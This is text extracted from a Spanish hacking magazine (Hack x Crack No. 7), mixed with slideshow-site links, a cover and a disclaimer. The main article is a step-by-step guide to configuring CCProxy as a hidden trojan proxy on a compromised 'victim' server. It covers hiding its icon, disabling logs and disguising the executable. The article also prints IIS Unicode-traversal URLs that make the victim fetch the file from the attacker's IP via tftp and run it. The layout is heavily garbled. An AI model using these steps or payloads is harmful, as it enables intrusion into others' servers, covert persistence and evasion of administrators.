                 IP Externa 83.54.215.78
                                           www.mocosoft.com                                      FTP: Esto nos permite tener un FTP-
                                                                       www.astalavista.com
                                                                       www.astalavista.com
                PC3                        IP Externa: 66.111.52.196
                                                       66.11           escuchando el puerto 80   Proxy y NO ACEPTARÁ que le pidas cosas
                IP Externa 89.36.230.235
                                           W eb-Proxy escuchando                                 distintas puesto que, aunque escuche
                                           peticiones externas en el
                                           puerto que queramos, en                               las peticiones en cualquier puerto solo
                                           este caso el 2880.          www.google.com
                                                                       www.google.com
                                                                       escuchando el puerto 80   gestionará correctamente peticiones a
                                           El W eb-Proxy procesará
                                           las peticiones de páginas                             Servidores FTP (normalmente en el
                                           Web y se conectará al
                                           puerto 80 de los                                      puerto 21). Fíjate en la imagen, nosotros
                                           Servidores W eb.
                                                                                                 hemos puesto el Servidor Proxy
                                                                                                 escuchando el puerto 3821.

                 Vamos a ver qué está
                 pasando:
                                                 PCs en cualquier punto del Planeta                                 Servidores FTP visitados
                 1- El PC 1 (80.65.24.123        conectado a Internet que quieren                                   por los PC1, PC2, PC3…
                                                 visitar FTPs de forma anónima
                 ) abre su Cliente de FTP        a través de un W eb-Proxy
                                                                                                                        ftp.hackxcrack.com
                 (por ejemplo el Flash FXP,                      PC1                                                    escuchando el puerto 21
                                                                 IP Externa 80.65.24.123
                 ampliamente tratado en
                 los números anteriores                                                                                 www.eresmas.com
                                                                                                                        www.eresmas.com
                                                                                                                        escuchando el puerto 21
                 de esta publicación) y lo                         PC2
                                                                   IP Externa 83.54.215.78
                 configura para que utilice                                                www.mocosoft.com
                                                                                                                        www.astalavista.com
                                                                                                                        www.astalavista.com
                 un FTP-Proxy, en este                           PC3                       IP Externa: 66.111.52.196
                                                                                                       66.11            escuchando el puerto 21
                                                                 IP Externa 89.36.230.235
                 caso un Servidor FTP-                                                     W eb-Proxy escuchando
                                                                                           peticiones externas en el
                 Proxy activo en la IP                                                     puerto que queramos, en
                                                                                           este caso el 3821.           www.google.com
                                                                                                                        www.google.com
                 65.111.52.196 y puerto                                                                                 escuchando el puerto 21
                                                                                           El W eb-Proxy procesará
                  3821.                                                                    las peticiones de páginas
                                                                                           Web y se conectará al
                 2.- El PC 1 emite una                                                     puerto 21 de los
                                                                                           Servidores FTP.
                                                                                                       FTP.
                 petición de conexión
                 desde su Cliente FTP a,
                 por ejemplo ftp.epson.com
                 3.- Como el Cliente FTP ha sido configurado                    escuchando el puerto 21, acepta la petición
                 para utilizar el Proxy instalado en la IP                      desde la IP 56.111.52.196 y responde
                 65.111.52.196 y puerto 3821, lo que hace NO                    inocentemente, no tiene ni idea que la petición
                 ES enviar la petición a ftp.epson.com, sino que                procede realmente del PC 1 (80.65.24.123).
                 envía la petición a la IP 65.111.52.196 en el                  6.- El FTP-Proxy recibe la respuesta de
                 puerto 3821.                                                   ftp.epson.com y la devuelve a PC 1
                 4.- El FTP-Proxy (65.111.52.196) recibe la                     (80.65.24.123 ).
                 petición del PC 1 y se conecta a ftp.epson.com                 Eso mismo ocurre con cada uno de los servicios
                 en el puerto 21                                                que activemos. Los proxys no solo tienen en
                 5.- El servidor ftp.epson.com, que está                        cuenta el puerto al que se conectan, sino el


PC PASO A PASO Nº 7                                                                                                                               Página 61
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




             tipo de servicio que hay tras ese puerto (FTP,              de administrador sobre el equipo hackeado
            HTTP, TELNET… …). Piensa que cada servicio                   saltará un error en plena cara del administrador
            tiene su propia forma de comunicarse mediante                remoto (algo muy poco recomendable) :p
            un protocolo concreto, por eso el Proxy DEBE                 - Port Map: Bueno, bueno, bueno… dejo esta
            SER PROGRAMADO de forma que sepa                             explicación para cuando hagamos "tunneling".
            comunicarse con esos servicios. Existe mucho                 Es un simple mapeo de puertos muy útil para
            software que alardea de llamarse Proxy pero                  redirigir puertos y, según como se mire, servicios.
            que solo admiten uno o dos servicios, CCProxy                Por ahora lo dejaremos desactivado porque
            no es ni de lejos el más completo pero es                    esto merece un artículo a parte ;)
            bastante "completito".
                                                                         En la imagen "Servicios a Configurar" puedes
            No podemos explicar ahora todos los servicios,               ver nuestra configuración. Si quieres cambiar
            por el momento, si has leído esta revista desde              los puertos de escucha puedes hacerlo, pero
            el principio ya conoces el HTTP, Secure http,                ten en cuenta que debe ser mayor que 1024
            FTP(Web), FTP y telnet. Pues venga, configura                debido a que los puertos 1-1024 cantan bastante
            esos servicios tal y como viste en la foto titulada          y son controlados muy de cerca por los firewalls
            "Servicios a Configurar" (no te vuelvo a poner               y otras herramientas del sistema. Te
            la foto que después en el foro dicen que                     recomendamos que elijas puertos no
            "rellenamos la revista" ;p)                                  conocidos/asignados, la lista de los llamados
                                                                         Puertos Conocidos la tienes en el número 6 de
            Ahora vuelve a mirarte la foto una vez más y                 PC PASO A PASO. Si utilizas un puerto conocido,
            te explico un par de cosas:                                  corres el riesgo de "pisar" otro software que
            - Auto Hide: Esto hace que cuando ejecutes el                esté a la escucha en ese puerto y nuestro
            programa, automáticamente se minimice y solo                 CCProxy no podrá iniciarse correctamente.
            quede el Tray Icon junto al reloj del sistema.
            Je, je, no encontrarás la forma de ocultar ese               4.- Configurando el ccproxy:
            icono desde la interfaz gráfica, algo poco                   Avanzada.
            importante si utilizas para su troyanización el
            CODE / DECODE (no saldrá el icono), pero si
                                                                         Ahora pulsamos sobre el botón ADVANCED y
            utilizas cualquier otro BUG el icono nos delatará.
                                                                         nos encontramos con esto.
            Pues bien, después te enseñaremos a ocultarlo
            añadiendo una interesante opción directamente
            en el archivo de configuración (ccproxy.ini) ;p
            - Auto Startup: En principio es para que los
            servicios se activen en cuanto ejecutes el
            p r o g ra m a , m e j o r l o s e l e c c i o n a m o s .
            - Auto Detect: Esto es genial, cuando subamos
            este archivo a una víctima no debemos
            preocuparnos ni tan siquiera de su IP Externa,
            el CCProxy seleccionará la IP Externa correcta
            ;)
            - NT Service: Lo dejamos desactivado, ya
            hemos explicado muchas veces esta opción en
            otros programas tratados, esta opción
            modificaría el registro de Windows y eso no
            nos interesa puesto que si no tenemos derechos

Página 62                                                                                                      PC PASO A PASO Nº 7
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




          Configúralo como nosotros puesto que vamos        Ahora nos vamos a la pestaña LOG y lo
          a troyanizar conexiones de cable (servidores)     desactivamos TODO. No queremos que se
          y estas opciones son para otros tipos de          guarde un registro de nuestras actividades, ni
          conexiones.                                       de las conexiones entrantes ni de nada de
                                                            nada ¿verdad? Recuerda que estamos
          Ahora vamos a la pestaña Cache y lo               configurándolo para actuar de troyano en una
          deshabilitamos TODO. Estas opciones crearían      máquina-víctima :)
          una caché donde guardaría los últimos sitios
          visitados y esas cosas, parecido a la caché del
          Internet Explorer: NO NOS INTERESA dejar
          tantas huellas y mucho menos consumir
          recursos innecesarios de la Víctima.




                                                            La pestaña mail déjala como esté, puesto que
          Ahora iremos a la pestaña Cascading Proxy y
                                                            no hemos activado ese servicio y no afectará
          comprobamos que está todo deshabilitado.
                                                            para nada.
          Esto nos permitiría por ejemplo, conectar
          nuestro ccproxy con otros Proxy y así conseguir
                                                            Ahora nos metemos en la pestaña Miscellaneous,
          un mayor anonimato, pero nosotros ya tenemos
                                                            que es muy interesante.
          conocimientos avanzados sobre el tema y
                                                            Password Protection: Nos permitiría, por ejemplo,
          sabemos crear cadenas de proxys con el
                                                            evitar el uso del Proxy por personas que no
          SocksCap y el SocksShain ¿verdad? (HackxCrack
                                                            conozcan la clave. Mejor lo dejamos
          número 3) ;p
                                                            desconectado, debemos ser generosos :)
                                                            Disable external users: Si activas esta opción,
                                                            el Proxy no permitirá que una IP EXTERNA
                                                            acceda al Proxy, es decir, el Proxy solo aceptaría
                                                            peticiones de la Red Local. Nosotros la dejaremos
                                                            desactivada puesto que queremos meterle el
                                                            programa a un remoto y conectarnos
                                                            posteriormente.
                                                            Languaje: Bueno, dejaremos el inglés, así no
                                                            damos pistas sobre nuestra procedencia :)
                                                            HIDE ALL: La activamos sin dudarlo, nos
                                                            acabamos de cargar el molesto Tray Icon. Ahora

PC PASO A PASO Nº 7                                                                                              Página 63
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




            ya somos invisibles :)                              6.- Configurando el ccproxy:
            SOCKS 4: Lo activamos, puesto que así nos           ¿Dónde está el CCProxy?
            aseguramos la compatibilidad (habría mucho          Ahora cerraremos el programa, volveremos a
            que decir sobre esto, coge el google e investiga    ejecutarlo y aparentemente no pasa nada, pero
            www.google.com)                                     SÍ, SÍ que pasa. En este momento el CCProxy
                                                                ya está ejecutándose. ¿cómo lo sabemos?

                                                                Hay dos maneras muy sencillas:
                                                                1.- Pulsamos las teclas Ctrl+Alt+Supr para que
                                                                nos salga el Administrador de tareas de Windows
                                                                y pulsamos sobre la pestaña procesos, podremos
                                                                ver como el CCProxy está ejecutándose :)




            Listo, pulsamos aceptar, en la siguiente OK y
            ya tenemos configurado nuestro CCProxy :)


            5.- Configurando el ccproxy:
                                                                2.- La otra
            Cuentas.
                                                                f o r m a ,
                                                                mucho más
                                            En principio y
                                                                interesante,
                                            para        ser
                                                                es abrir una
                                            generosos,
                                                                Ventana de
                                            dejaremos que
                                                                Comandos
                                            pueda utilizar el
                                                                (mil veces
                                            Proxy cualquier
                                                                explicada en
                                            persona que
                                                                anteriores
                                            conozca su
                                                                números) e
                                            existencia :), si
                                                                introducir el
                                            quieres hacer
                                                                comando que
                                            pruebas de
                                                                nos listará los
                                            acceso poner
                                                                puertos que
            usuarios y tal te lo dejamos a ti, que después
                                                                están a la
            dicen en nuestro foro (www.hackxcrack.com)
                                                                escucha:
            que rellenamos páginas explicando cosas
                                                                netstat -a -n
            demasiado sencillas.

Página 64                                                                                          PC PASO A PASO Nº 7
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO



          Podemos ver perfectamente que los puertos         Ahora tenemos que subirle los archivos
          configurados en el CCProxy están "a la escucha"   a la víctima. Tenemos varias posibilidades:
          esperando ansiosos conexiones :) En nuestro       - Subimos el "servu" a la víctima (Servidor FTP),
          caso el 2880, 3821 y 4823.                        nos conectamos con un Cliente FTP
                                                            (FlashFXP) y le metemos los archivos
          Una vez comprobado visto que funciona,            donde queramos (esto ya se estudió
          cerramos el programa desde el Administrador       en su momento). Todo esto utilizando
          de Tareas.                                        el CODE /DECODE bug y el TFTPD (Servidor
                                                            TFTP).
          7.- Preparando el programa para                   - Subimos los archivos uno a uno mediante el
          Subirlo a la Víctima:                             CODE / DECODE y el TFTPD.
                                                            - Comprimimos todos los archivos en un archivo
          Lo primero que hacemos, como siempre, es          autodescomprimible mediante el CODE /
          cambiar el nombre del ejecutable (CCProxy.exe)    DECODE y el TFTPD, lo ejecutamos para que
          por otro menos llamativo para que sea             se autodescomprima y finalmente ejecutamos
          confundido cuando el administrador visualice      nuestro CCProxy (winscreen.exe)
          su Administrador de Tareas, por ejemplo
          podemos llamarlo winscreen.exe (esto ya lo        Lo lógico sería utilizar la tercera opción, pero
          hemos explicado mil veces, como si quieres        no tengo espacio en este artículo para enseñar
          llamarlo winscreen.dll para que desaparezca el    paso a paso eso de los Self-Extracting files, así
          icono, da igual).                                 que utilizaremos el segundo método, lo que
          Ahora nos vamos al directorio c:ccproxy (donde   siempre hemos hecho en hackxcrack. Por cierto,
          instalamos el ccproxy) y eliminamos todo lo       si alguien tiene ya unos cuantos servidores
          innecesario:                                      hackeados subir los archivos es algo
          - La carpeta smtp al completo                     verdaderamente simple.
          - Todos los archivos de la carpeta languaje
          excepto el English.ini (el idioma seleccionado    8.- Subiendo el CCProxy a la
          en la configuración)                              Víctima     y   navegando
          - La carpeta log al completo                      anónimamente :)
          - Y de la carpeta principal solo deben quedar
          estos                                             Subiremos todos los archivos a la víctima, en
                                                            este caso al servidor de hack x crack
                                                            mediante el code-decode bug y ayudados
                                                            del TFTPD, lo haré sin explicaciones
                                                            ni aclaraciones, hemos dedicado muchas
                                                            páginas (casi dos revistas enteras) a
                                                            explicar todo lo que verás en las siguientes
                                                            líneas, si no lo entiendes seguro que no
                                                            has leído los anteriores números (el resto
                                                            ya lo tenéis controlado ;)

                                                            Después de escanear y localizar el bug
                                                            code/decode subimos todos los archivos a la
                                                            víctima (el servidor de Hack x Crack)
                                                            en, por ejemplo, la carpeta d:WINNTsystem32



PC PASO A PASO Nº 7                                                                                             Página 65
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO



            http://80.36.230.235/scripts/..%c0%af../win          autoinicializables (que se reinicien junto al
            nt/system32/cmd.exe?/c+d:winntsystem32             sistema)… esto será muy útil para ir dejando
            tftp.exe%20-i%20TU-IP-PONLA-                        ya de lado el "masticado" code-decode.
            A Q U I % 2 0 g e t % 2 0
            winscreen.exe%20d:winntsystem32winscr             Espero vuestras críticas respecto este artículo
            een.exe                                              en el foro de www.hackxcrack.com, porque es,
                                                                 posiblemente, el único texto publicado que no
             y así con todos ellos. No te olvides de crear       empieza desde cero e incluye elementos ya
            la carpeta languaje y meter dentro el English.ini    estudiados. Si no os gustan las cosas explicadas
                                                                 así, tendremos que utilizar más páginas para
            Una vez están todos arriba, ejecutamos el            las mismas cosas y reincidir sobre los temas
            ccproxy (winscreen.exe)                              tratados… ya me contareis :)
            http://80.36.230.235/scripts/..%c0%af../win
            nt/system32/cmd.exe?/c+d:winntsystem32
            winscreen.exe

            Ahora configuramos nuestro explorador para                 EL GANADOR DEL
            que utilice como proxy a la víctima o mejor
            (mucho mejor) utilizamos el SocksCap
            apuntando al puerto del SocksChain para lanzar
            el Explorador y que admita socks4, configurando
                                                                    SORTEO DE UN SUSE
            previamente el SocksChain para tener como
            anonimizador el servidor-víctima que acabamos
            de hackear.                                            LINUX 8.1 DEL MES DE
            9.- ¿Has entendido algo del punto
            8?                                                                ENERO ES:
            He repasado el artículo un par de veces y
            posiblemente sea bastante incomprensible para
            mucha peña y realmente lo siento mucho. En                GUSTAVO BARON
            el próximo artículo, según las dudas que salgan
            en el foro reincidiré sobre todo esto (mas
            detalladamente) y explicaré lo de los archivos
            autoejecutables. Si es necesario incluso explicaré
                                                                 PALMA DE MALLORCA
            rápidamente como configurar el SocksCap y el
            SocksChain para utilizar el proxy de la víctima,
                                                                 SEGUIR LLAMANDO, EL PROXIMO
            pero todo esto ya se ha explicado, simplemente
            tienes que aplicar los conocimientos adquiridos.

                                                                  PODRIA SER PARA TI (PAG 18)
            Si no me han informado mal, en el próximo
            número enseñarán a "asaltar" a los pobres
            Windows NT por el sistema de ficheros
            compartidos, además enseñarán a hacerse con
            el pass del administrador y a transformar todos
            los troyanos que hemos estudiado en



Página 66                                                                                            PC PASO A PASO Nº 7
NÚMERO1:

                                               -CREA TU PRIMER TROYANO
                                               INDETECTABLE POR LOS ANTIVIRUS.
                                               -FLASHFXP: SIN LÍMITE DE VELOCIDAD.
                                               -FTP SIN SECRETOS: PASVMODE.
                                               -PORT MODE/PASV MODE Y LOS
                                               FIREWALL: LA UTILIDAD DE LO
                                               APRENDIDO.
                                               -TCP-IP:INICIACIÓN (PARTE 1).
                                               -EL MEJOR GRUPO DE SERVIDORES FTP
                                               DE HABLA HISPANA.
                                               -EDONKEY 2000 Y SPANISHARE.
                                               -LA FLECHA ÁCIDA.




NÚMERO 2:

     -CODE/DECODE BUG: INTRODUCCIÓN.
     -CODE/DECODE BUG: LOCALIZACIÓN
     DEL OBJETIVO.
     -CODE/DECODE BUG: LÍNEA DE
     COMANDOS.
     -CODE/DECODE BUG: SUBIENDO
     ARCHIVOS AL SERVIDOR REMOTO.
     -OCULTACIÓN DE IP: PRIMEROS PASOS.
     -LA FLECHA ÁCIDA: LA SS DIGITAL.
     AZNAR AL FRENTE DE LA SS DEL SIGLO
     XXI.




                                            NÚMERO 3:

                                                  -PROXY: OCULTANDO NUESTRA IP.
                                                  ASUMIENDO CONCEPTOS.
                                                  -PROXY: OCULTANDO NUESTRA IP.
                                                  ENCADENANDO PROXIES.
                                                  -PROXY: OCULTANDO NUESTRA IP.
                                                  OCULTANDO TODOS NUESTROS
                                                  PROGRAMAS TRAS LAS CADENAS DE
                                                  PROXIES.
                                                  -EL SERVIDOR DE HACKXCRACK
                                                  CONFIGURACIÓN Y MODO DE EMPLEO.
                                                  -SALA DE PRACTICAS: EXPLICACIÓN.
                                                  -PRÁCTICA 1ª: SUBIENDO UN ARCHIVO
                                                  A NUESTRO SERVIDOR.
                                                  -PRÁCTICA 2ª: MONTANDO UN DUMP
                                                  CON EL SERV-U.
                                                  PRÁCTICA 3ª: CODE/DECODE BUG.
                                                  LÍNEA DE COMANDOS.
                                                  -PREGUNTAS Y DUDAS.
NÚMERO 4:

                                                 -CREA TU SEGUNDO TROYANO,
                                                 INDETECTABLE E INMUNE A LOS
                                                 ANTIVIRUS.
                                                         CONOCIENDO EL RADMIN.
                                                         GESTIONANDO UNA SALA
                                                         DE ORDENADORES.
                                                         OCULTANDO EL RADMIN.
                                                         INSTALANDO EL RADMIN
                                                         EN EQUIPOS REMOTOS.
                                                 -OCULTACIÓN DE IP POR NOMBRE DE
                                                 DOMINIO.
                                                 -CREA LETRAS DE IMPACTO PARA TUS
                                                 DOCUMENTOS (LETRAS DE FUEGO).
                                                 - CONSIGUE UNA IP FIJA.




NÚMERO 5:

       -HACK-OPINION: LA PIRATERÍA EN
INTERNET.
       -ROOTKITS: LA PESADILLA DE
CUALQUIER       ADMINISTRADOR.
       -ROOTKITS: EL SR. NTROOT.
       -WAREZ: APPZ, GAMEZ, MP3Z, DIVX,
       FTPZ, 0-DAY.
       -APRENDIENDO A COMPILAR
       PROGRAMAS. COMPILA TU PROPIO
       NETCAT.
       -BUGS, ERRORES Y OTRAS FORMA DE
       JOD...
       -NETBIOS: ESTUDIO Y PENETRACIÓN DE
       SISTEMAS.
       -ASESINADOS POR LA LSSI.
       -LISTADO DE ORDENES PARA NETBIOS.
       -HACK-OPINION: PAGOS POR INTERNET
       SEGUROS YÁ.




                                                        NÚMERO 6:

                                                        - PASA TUS PELICULAS A DIVX (STREAMING)
                                                        - PASA TUS PELICULAS A DIVX II (CODEC DIVX)
                                                        - PUERTOS & SERVICIOS
                                                        - eMule: EL NUEVO REY DEL P2P
                                                        - NUEVA SECCION: PROGRAMACION DESDE 0
                                                        - CURSO DE VISUAL BASIC
                                                        -IPHXC: EL TERCER TROYANO DE HXC
                                                        - TENDENCIAS ACTUALES EN CODIGO MALICIOSO
                                                        - OCULTACION DE FICHEROS. METODO STREAM
                                                        (ads)
                                                        - TRASTEANDO CON EL HARDWARE DE UNA LAN

Más contenido relacionado

DOCX
Manual de instalacion del servidor proxy
DOCX
Instalacion Y Configuracion De Servidor Proxy
PDF
Manual de instalacion proxy
PDF
Servidor proxy en centos
PPTX
Configuracion proxy Windows server 2008
PDF
Manual servidor proxy
PDF
Instalación y Configuración de Exchange 2013 en Windows Server 2012 R2
PDF
Instalacion del servidor proxy para conectar una red lan a una pc con salid...
Manual de instalacion del servidor proxy
Instalacion Y Configuracion De Servidor Proxy
Manual de instalacion proxy
Servidor proxy en centos
Configuracion proxy Windows server 2008
Manual servidor proxy
Instalación y Configuración de Exchange 2013 en Windows Server 2012 R2
Instalacion del servidor proxy para conectar una red lan a una pc con salid...

Similar a Hxc7 (20)

PDF
Hxc5
PDF
Hxc8
PDF
Hxc4
PDF
Hxc22
PDF
Haxcra8.pdf
PDF
Hxc9
PDF
Haxcra5.pdf
PDF
Hxc21
PDF
Hxc17
PDF
Hxc23
PDF
Hxc19
PDF
Hxc14
PDF
Hxc16
PDF
Hxc10
PDF
Hxc15
PDF
Hxc18
PDF
Hxc11
PDF
Hxc13
PDF
Hxc12
PDF
Hxc20
Hxc5
Hxc8
Hxc4
Hxc22
Haxcra8.pdf
Hxc9
Haxcra5.pdf
Hxc21
Hxc17
Hxc23
Hxc19
Hxc14
Hxc16
Hxc10
Hxc15
Hxc18
Hxc11
Hxc13
Hxc12
Hxc20
Publicidad

Más de rubenroa (20)

PPTX
Estudios epidemiologicos
PPTX
Efectividad de la vacunacion Covid-19 en variante delta
PPTX
Causalidad
PPTX
Evaluacion de tecnologias sanitarias
PPT
Epidemiologia
PPT
Pediatrics 2008 jul 122(1) 143 8, figure-1
PPT
Introducción análisis farmacoepidemiológico sss&farma-taller15jun2011
PPTX
Maceira sss&farma-taller15jun2011
PPTX
Datos cohorte chilena sida (1)
PPT
Ferinject
PPTX
Kappos fingolimod moa-clin_results_vfinal_buenosaires1a
PPT
Uso Racional de Medicamentos
PPS
tabaquismo
PPT
Sesion ppt -2641_
PPT
Auditoria em
PPS
Indice tobillo brazo
PPS
indice tobillo brazo
PPTX
Epistemología y paradigmas
PPS
Vertigo acv
PPS
Apendicectomia
Estudios epidemiologicos
Efectividad de la vacunacion Covid-19 en variante delta
Causalidad
Evaluacion de tecnologias sanitarias
Epidemiologia
Pediatrics 2008 jul 122(1) 143 8, figure-1
Introducción análisis farmacoepidemiológico sss&farma-taller15jun2011
Maceira sss&farma-taller15jun2011
Datos cohorte chilena sida (1)
Ferinject
Kappos fingolimod moa-clin_results_vfinal_buenosaires1a
Uso Racional de Medicamentos
tabaquismo
Sesion ppt -2641_
Auditoria em
Indice tobillo brazo
indice tobillo brazo
Epistemología y paradigmas
Vertigo acv
Apendicectomia
Publicidad

Último (20)

DOCX
Contenido Fundamentos de comunicaciones Fibra Optica (1).docx
PPT
El-Gobierno-Electrónico-En-El-Estado-Bolivia
PPTX
Presentacion de Alba Curso Auditores Internos ISO 19011
DOCX
Zarate Quispe Alex aldayir aplicaciones de internet .docx
PDF
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
PPTX
Presentación PASANTIAS AuditorioOO..pptx
PDF
Maste clas de estructura metálica y arquitectura
PPT
introduccion a las_web en el 2025_mejoras.ppt
PDF
TRABAJO DE TECNOLOGIA.pdf...........................
PDF
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
PDF
Estrategia de Apoyo de Daylin Castaño (5).pdf
PDF
CyberOps Associate - Cisco Networking Academy
PPTX
Curso de generación de energía mediante sistemas solares
PDF
Influencia-del-uso-de-redes-sociales.pdf
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
PPTX
El uso de las TIC en la vida cotidiana..
PDF
clase auditoria informatica 2025.........
PDF
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN
Contenido Fundamentos de comunicaciones Fibra Optica (1).docx
El-Gobierno-Electrónico-En-El-Estado-Bolivia
Presentacion de Alba Curso Auditores Internos ISO 19011
Zarate Quispe Alex aldayir aplicaciones de internet .docx
ADMINISTRACIÓN DE ARCHIVOS - TICS (SENA).pdf
Presentación PASANTIAS AuditorioOO..pptx
Maste clas de estructura metálica y arquitectura
introduccion a las_web en el 2025_mejoras.ppt
TRABAJO DE TECNOLOGIA.pdf...........................
Instrucciones simples, respuestas poderosas. La fórmula del prompt perfecto.
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
historia_web de la creacion de un navegador_presentacion.pptx
Estrategia de Apoyo de Daylin Castaño (5).pdf
CyberOps Associate - Cisco Networking Academy
Curso de generación de energía mediante sistemas solares
Influencia-del-uso-de-redes-sociales.pdf
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
El uso de las TIC en la vida cotidiana..
clase auditoria informatica 2025.........
MANUAL TECNOLOGÍA SER MINISTERIO EDUCACIÓN

Hxc7

  • 1. PC HACK X CRACK: CCPROXY -- UTILIZA A TUS VÍCTIMAS !!! P A S O P A S Oa a a a a a a aa a a a a a CONSIGUE UNA CUENTA POP3 LOS CUADERNOS DE HACK X CRACK - HACK X CRACK - HACK X CRACK HACK CRACK www.hackxcrack.com GRATIS :) CURSO DE VISUAL BASIC El Cuarto Troyano de SEGUNDA ENTREGA !! de Hack x Crack: Accede por TELNET a Servidores POP3 EL CCPROXY Un Servidor Proxy Oculto para Anonimizar nuestras Conexiones IPHXC (SEGUNDA PARTE) NUESTRO TERCER TROYANO Entendiendo los Protocolos La Inseguridad del Protocolo POP3: Capturando las Claves RIPPEANDO (2ª parte): de nuestra Cuenta de Correo EL AUDIO AC3 -- MP3 -- OGG Nº 7 -- P.V.P. 4,5 EUROS Los Primeros Pasos con IRIS RED) 00007 (SNIFFANDO LA 8 414090 202756 APRENDE CON NOSOTROS LO QUE NADIE SE ATREVE A ENSEÑAR
  • 2. PC P P A A LOS CUADERNOS DE S S HACK O O CRACK P A S O aa P A S Oaa www.hackxcrack.com a a a a a a aa a a a a a a a aa a a a a EDITORIAL: EDITOTRANS S.L. Director de la Publicación C.I.F: B43675701 J. Sentís E-mail Director Editorial director@hackxcrack.com I. SENTIS Diseño gráfico: E-mail contacto J. M. Velasco director@editotrans.com Contacto diseñador gráfico Título de la publicación grafico@hackxcrack.com Los Cuadernos de HACK X CRACK. Redactores Nombre Comercial de la publicacíón AZIMUT, ROTEADO, FASTIC, MORDEA, FAUSTO, PC PASO A PASO ENTROPIC, MEIDOR, HASHIMUIRA, BACKBONE, ZORTEMIUS, AK22, DORKAN, KMORK, MAILA, Web TITINA, SIMPSIM... ... ... ... ... www.hackxcrack.com Contacto redactores Deposito legal: B.26805-2002 redactores@hackxcrack.com Código EAN: 8414090202756 Código ISSN: En proceso Colaboradores Mas de 130 personas: de España, de Brasil, de Argentina, de Francia, de Alemania de Japón y algún Estadounidense. Contacto colaboradores colaboradores@hackxcrack.com Imprime I.G. PRINTONE S.A. Tel 91 808 50 15 Distribución Coedis S.L. Avda. de Barcelona 225. Molins de Rei. Barcelona. Tel 93 680 03 60 FAX 93 668 82 59 WEB: www.coedis.com (mapa de distribución en la web) © Copyright Editotrans S.L. NUMERO 7 -- PRINTED IN SPAIN PERIOCIDAD MENSUAL Página 2 PC PASO A PASO Nº 6
  • 3. DECLARACION DE INTENCIONES PARA "LOS OTROS": 1.- La intención de la presente publicación NO ES fomentar la piratería curiosidad deberéis ponerla VOSOTROS, porque los medios los facilitaremos informática ni la “delincuencia” en la Red. NOSOTROS. En las siguientes líneas os descubrimos cómo podremos 2.- Cualquier texto publicado es VALIDADO por nuestra Asesoría Jurídica, conseguir nuestros objetivos y definimos algunas de las palabras que más por lo que advertimos a cualquier persona, empresa u organización de la han sido violadas y retorcidas en su significado. inutilidad de cualquier iniciativa jurídica en nuestra contra. Aun así, en caso de cualquier iniciativa en contra de esta revista, deberá ser debidamente Hacker: Este término ha sufrido a lo largo de su corta historia una horrible presentada y resuelta en la Razón Social que figura en nuestros documentos conspiración perpetrada por la ignorancia de los medios, eso que de constitución. personalmente llamo "periodismo de telediario" (en clara alusión a los 3.- Esta publicación no se hace responsable del mal uso de los conocimientos ridículos artículos que no hacen mas que intoxicar nuestra percepción de que se exponen. las cosas e insultar nuestra inteligencia). Ese tipo de periodismo unido a 4.- Esta publicación NO FACILITARÁ los datos de nuestros colaboradores "otros poderes", desde los monopolios que deben justificar su incompetencia ni el origen de nuestros conocimientos salvo ORDEN JUDICIAL y, aun así, hasta los gobiernos que deben justificar sus intereses ocultos pasando por advertimos que algunos de esos colaboradores NO SON CONOCIDOS mas la industria del cine (normalmente demonológica) y los medios informativos que por sus NICKS (alias). Por ello, correrá a cargo de los organismos "de masas". pertinentes su “descubrimiento”. 5.- Esta publicación NO SE HACE RESPONSABLE ni tienen por qué COMPARTIR Pues bien, HACKER no es mas que una persona que posee conocimientos las opiniones personales vertidas por sus colaboradores, por lo que NO avanzados sobre una materia en concreto, normalmente relacionados con SOMOS RESPONSABLES de las mismas. la tecnología aunque ni mucho menos limitado a ello. Ponen sus aptitudes 6.- Cualquier texto publicado estará bajo las protecciones de DERECHOS al servicio de un único objetivo: EL CONOCIMIENTO. Desean conocer el DE AUTOR y no se permite su copia, publicación, modificación o distribución funcionamiento de "las cosas" y no encuentran límites en sus camino mas sin antes obtener el permiso de esta editorial. De este punto quedan exentos que su propia curiosidad. No se dedican a destruir ni a causar estragos aquellos textos que han sido obtenidos de terceros y/o que están sujetos entre sus "victimas", no se dedican a robar ni a chantajear ni a regodearse a otras licencias (ya sean por parte de su autor o por terceros). de sus "conquistas", muy al contrario suelen advertir a terceros de las 7.- Si desean ponerse en contacto con nuestro departamento jurídico, debilidades de sus sistemas y, desgraciadamente, esos "terceros" en lugar rogamos enviar mail a juridico@hackxcrack.com de agradecerles su aviso se dedican a denunciarlos o perseguirlos… aunque no siempre es así, por supuesto, muchas compañías y gobiernos han PARA NUESTROS LECTORES: aprendido lo valiosos que son los HACKERS y ahora algunos son colaboradores (o empleados) de estos. BILL GATES es un HACKER (el papá ventanas), Como podréis ver, esta no es una revista mas, por primera vez tenéis ante como Linus Torvalds (el papá Linux) o Grace Hooper (la Almirante, vosotros una publicación LIBRE que os ofrecerá la posibilidad de explorar creadora del Lenguaje COBOL), los autores del COREWAR Robert Thomas la red tal y como debe explorarse ;) Morris, Douglas McIlroy y Victor Vysottsky (precursores de los creadores de virus informáticos), Fred Cohen (el primer investigador y Esta publicación responde a la pregunta mas veces expuesta en LA RED: autor de los virus de la historia), Dennis Ritchie y Ken Thompson ¿Como puedo ser un hacker? Bien, ahora seguro que muchos ya se están ("hacedores" del Lenguaje C y co-creadores del SO UNIX), Gary Kildall "sonriendo" y pensando lo ilusos que somos al intentar "eregirnos" en (autor del sistema operativo CMP y CPM/86), Tim Paterson (autor del "portadores de LA LUZ", pensando que seremos una "escuela de lamers" Quick & Dirty DOS), Morris (autor de "The tour of the Worm"), Kevin y similares a otras publicaciones que, entre sus 100 páginas de revista solo Mitnick (el más buscado por el FBI), Phiber 